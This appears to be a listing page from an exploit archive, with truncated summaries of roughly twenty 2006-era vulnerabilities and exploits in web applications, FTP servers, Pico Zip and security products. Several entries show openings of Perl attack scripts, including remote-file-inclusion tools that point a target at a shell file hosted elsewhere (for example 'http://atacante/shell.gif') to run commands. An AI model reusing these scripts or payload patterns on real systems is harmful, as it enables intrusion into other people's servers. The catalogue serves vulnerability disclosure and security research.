SturGeoN Upload - Arbitrary File Upload

SturGeoN Upload - Arbitrary File Upload source: https://www.securityfocus.com/bid/18764/info SturGeoN Upload is prone to an arbitrary file-upload vulnerability. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may...

Webmin 'miniserv.pl' Arbitrary File Disclosure

The version of Webmin installed on the remote host is affected by an information disclosure flaw due to a flaw in the Perl script 'miniserv.pl'. This flaw could allow a remote, unauthenticated attacker to read arbitrary files on the affected host, subject to the privileges of the web server user...

DREAMACCOUNT V3.1 Remote Command Execution Exploit

---------------------------------------------------- DREAMACCOUNT V3.1 Command Execution Exploit ---------------------------------------------------- Discovered By CrAshoVeRrIdEArabian Security Team Coded By Drago84Exclusive Security Team ---------------------------------------------------- site ...

FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion

!/usr/bin/perl TUFaT FlashBB perl flashBB.pl http://target.com/flashbb http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; Contact: h4ntu [email protected] use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// ||...

Pico Zip 4.01 (Long Filename) Buffer Overflow Exploit

Exploit for unknown platform in category local exploits ===================================================== Pico Zip 4.01 Long Filename Buffer Overflow Exploit ===================================================== !/usr/bin/perl Pico Zip v. 4.01 Long Filename Buffer Overflow Original advisory -...

Pico Zip 4.01 - Filename Local Buffer Overflow

Pico Zip 4.01 - Filename Local Buffer Overflow !/usr/bin/perl Pico Zip v. 4.01 Long Filename Buffer Overflow Original advisory - http://www.securityfocus.com/archive/1/437103/30/30/threaded Author - c0rrupt Greets - sh0uts to n0limit, muts, and brax for the music ; The vulnerability is caused due...

Microsoft Exchange Server 20002003 - Outlook Web Access Script Injection

Microsoft Exchange Server 20002003 - Outlook Web Access Script Injection source: https://www.securityfocus.com/bid/18381/info Microsoft Exchange Server Outlook Web Access is prone to a script-injection vulnerability. A remote attacker can exploit this issue by sending a malicious email message to...

Guestex Guestbook 1.00 (email) Remote Code Execution Exploit

Exploit for unknown platform in category web applications ============================================================ Guestex Guestbook 1.00 email Remote Code Execution Exploit ============================================================ Creator: K-sPecial xzziroz.net of .aware awarenetwork.org...

MiniNuke 2.x (create an admin) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications =========================================================== MiniNuke 2.x create an admin Remote SQL Injection Exploit =========================================================== !/usr/bin/perl Method found & Exploit scripted by nukedx...

phpbazar-210.pl.txt

!/usr/bin/perl phpBazar example: if host: http://sitebug.com/dir1/classified.php is vulnerable then USE: phpbazar-210.pl http://sitebug.com/dir1/ http://www.site.com.br/shell.txt cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv =...

Kaspersky antivirus 6: HTTP monitor bypassing

Kaspersky antivirus 6 Kaspersky internet security 6 www.kaspersky.com Vulnerable Systems: KAV6, KIS6 Detail: The vulnerability is caused due to HTTP parsing errors in the HTTP monitor Kaspersky Web-antivirus. Any mailicious software on local computer can bypass HTTP virus monitor. Solution: There...

RadScripts RadLance 7.0 - 'popup.php' Local File Inclusion

source: https://www.securityfocus.com/bid/17975/info RadLance is prone to a local file-include vulnerability. This may allow unauthorized users to view files and to execute local scripts. RadLance Gold 7.0 is reported affected by this issue; other versions may also be vulnerable. !/usr/bin/perl...

DeluxeBB 1.06 - 'name' SQL Injection (mq=off)

!/usr/bin/perl use IO::Socket; print q DeluxeBB 1.06 Remote SQL Injection Exploit exploit discovered and coded by KingOfSka http://contropotere.netsons.org ; if !$ARGV2 print q Usage: perl dbbxpl.pl host /directory/ victimuserid perl dbbxpl.pl www.somesite.com /forum/ 1 ; $server = $ARGV0; $dir =...

[Full-disclosure] SEC Consult SA-20060512-0 :: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure

SEC Consult Security Advisory 20060512-0 ============================================================== title: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure program: Symantec Enterprise FW vulnerable version: 8.0 homepage: www.symantec.com found: 2005-09-13 by: SEC Consult /...

Jetbox CMS 2.1 - relative_script_path Remote File Inclusion

Jetbox CMS 2.1 - relativescriptpath Remote File Inclusion !/usr/bin/perl JetBox CMS Remote File Include Exploit & Advisorie: beford uso: perl own.pl perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://jetbox.streamedge.co...

HiveMail 1.3 - 'addressbook.add.php' Remote Code Execution

!/usr/bin/perl HiveMail = 1.3 remote command execution exploit Advisory: http://www.gulftech.org/?node=research&articleid=00098-02102006 To get the hivesession: log on hivemail with firefox then look at the hivesession number in the url. yes i know... Dork: "Already have an account?" "Enter your...

TinyFTPD <= 1.4 (USER) Remote Buffer Overflow DoS

No description provided by source. !/bin/perl Title: TinyFTPD = 1.4 USER command D.O.S Credits: Oo use IO::Socket; print "i TinyFTPD = 1.4 USER command D.O.S\n"; print "i coded by Oo\n"; if @ARGV 2 print "\n Usage: tinyftpddos.pl host port\n"; print " Exemple: tinyftpddos.pl 192.168.0.1 21\n";...

Fast Click 1.1.3/2.3.8 - 'show.php' Remote File Inclusion

!/usr/bin/perl Fast Click perl fc.pl http://target.com/fclick/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// || !$cmdvusage head; while print "shell...

Aardvark Topsites PHP <= 4.2.2 (lostpw.php) Remote Include Exploit

No description provided by source. !/usr/bin/perl Aardvark Topsites PHP =4.2.2 Remote Command Execution Exploit Copyright c 2006 cijfer cijfer@netti!fi All rights reserved. never ctrl+c again. cijfer$ http://target.com/dir host changed to 'http://target.com/dir' cijfer$ to set your PHP shell...

confixx_exploit.pl.txt

sry - i know this isn't a cvs repository here - but the code posted yesterday was written after some 'b33r' an i made it looking a little less drunk this morning. bye defa ----BOF---- !/usr/bin/perl exploit for confixx professional = 3.1.2 the vulerability was discovered by: LoK Crew references:...